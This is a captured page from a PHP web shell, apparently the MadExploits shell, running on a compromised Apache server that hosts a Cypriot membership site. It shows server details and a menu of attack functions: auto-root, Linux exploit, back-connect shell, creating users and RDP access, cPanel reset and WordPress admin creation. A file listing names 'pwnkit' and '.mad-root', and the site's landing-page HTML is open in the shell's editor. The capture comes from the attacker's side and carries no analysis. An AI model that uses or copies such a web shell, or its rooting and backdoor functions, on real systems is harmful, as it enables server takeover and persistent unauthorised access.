Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 108.162.216.214
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
administrator /
livenow.com.cy /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
.htaccess
205
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
index.html
6.05
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>LiveNow Premium Membership</title> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> <style> * { margin: 0; padding: 0; box-sizing: border-box; } @keyframes gradientBG { 0% { background-position: 0% 50%; } 50% { background-position: 100% 50%; } 100% { background-position: 0% 50%; } } @keyframes fadeInUp { from { opacity: 0; transform: translateY(20px); } to { opacity: 1; transform: translateY(0); } } body { font-family: 'Helvetica', sans-serif; background: linear-gradient(45deg, #042D2D, #00FFFF, #042D2D); background-size: 200% 200%; animation: gradientBG 15s ease infinite; min-height: 100vh; display: flex; justify-content: center; align-items: center; overflow-x: hidden; } .container { width: 90%; max-width: 500px; padding: 40px 20px; display: flex; flex-direction: column; align-items: center; } .logo-container { width: 100%; display: flex; justify-content: center; margin-bottom: 30px; animation: fadeInUp 1s ease; } .logo { width: 100%; max-width: 300px; } h1 { color: white; font-size: 24px; text-align: center; margin-bottom: 40px; text-transform: uppercase; letter-spacing: 2px; animation: fadeInUp 1s ease 0.2s; opacity: 0; animation-fill-mode: forwards; width: 100%; } .buttons-container { width: 100%; text-align: center; display: flex; flex-direction: column; align-items: center; gap: 20px; } .button { display: flex; justify-content: center; align-items: center; width: 100%; padding: 20px; border: 2px solid #00FFFF; border-radius: 10px; background: rgba(4, 45, 45, 0.15); color: #00FFFF; text-decoration: none; font-size: 20px; font-weight: 500; transition: all 0.3s ease; backdrop-filter: blur(5px); box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1); animation: fadeInUp 1s ease; opacity: 0; animation-fill-mode: forwards; } .button:hover { background: #00FFFF; color: #042D2D; transform: translateY(-2px); box-shadow: 0 6px 12px rgba(0, 255, 255, 0.3); } h2 { color: white; text-align: center; margin: 40px 0 20px; font-size: 18px; letter-spacing: 1px; animation: fadeInUp 1s ease 1s; opacity: 0; animation-fill-mode: forwards; width: 100%; } .social-icons { display: flex; justify-content: center; gap: 30px; margin-top: 20px; animation: fadeInUp 1s ease 1.2s; opacity: 0; animation-fill-mode: forwards; } .social-icons a { color: white; font-size: 24px; transition: all 0.3s ease; } .social-icons a:hover { color: #00FFFF; transform: translateY(-3px); } .copyright { color: rgba(255, 255, 255, 0.8); text-align: center; margin-top: 40px; font-size: 14px; animation: fadeInUp 1s ease 1.4s; opacity: 0; animation-fill-mode: forwards; width: 100%; } @media (min-width: 768px) { .container { background: rgba(4, 45, 45, 0.4); border-radius: 20px; backdrop-filter: blur(10px); padding: 40px; box-shadow: 0 10px 30px rgba(0, 0, 0, 0.2); } } @media (max-width: 768px) { body { min-height: 100vh; background-size: cover; } } </style> </head> <body> <div class="container"> <div class="logo-container"> <img src="https://sbs.cy/media/LiveNow-logo-logn-light.png" alt="LiveNow Logo" class="logo"> </div> <h1>Premium Membership</h1> <div class="buttons-container"> <a href="https://premium.livenow.com.cy/goal-setting.html" class="button">Εργαστήριο 2024</a> <a href="https://livenow.typeform.com/merchant" class="button">Πρότεινε Κατάστημα</a> <a href="https://livenow.typeform.com/support" class="button">Υποστήριξη</a> </div> <h2>Συνδέσου μαζί μας</h2> <div class="social-icons"> <a href="https://www.facebook.com/livenow.lifestyle/" target="_blank" aria-label="Facebook"><i class="fab fa-facebook"></i></a> <a href="https://www.instagram.com/livenow.lifestyle/" target="_blank" aria-label="Instagram"><i class="fab fa-instagram"></i></a> <a href="https://linkedin.com/company/livenowinternational" target="_blank" aria-label="LinkedIn"><i class="fab fa-linkedin"></i></a> <a href="https://twitter.com/livenow_intern" target="_blank" aria-label="Twitter"><i class="fab fa-twitter"></i></a> </div> <p class="copyright">LiveNow Affiliate Software LTD © 2024<br>All rights reserved.</p> </div> </body> </html>
Close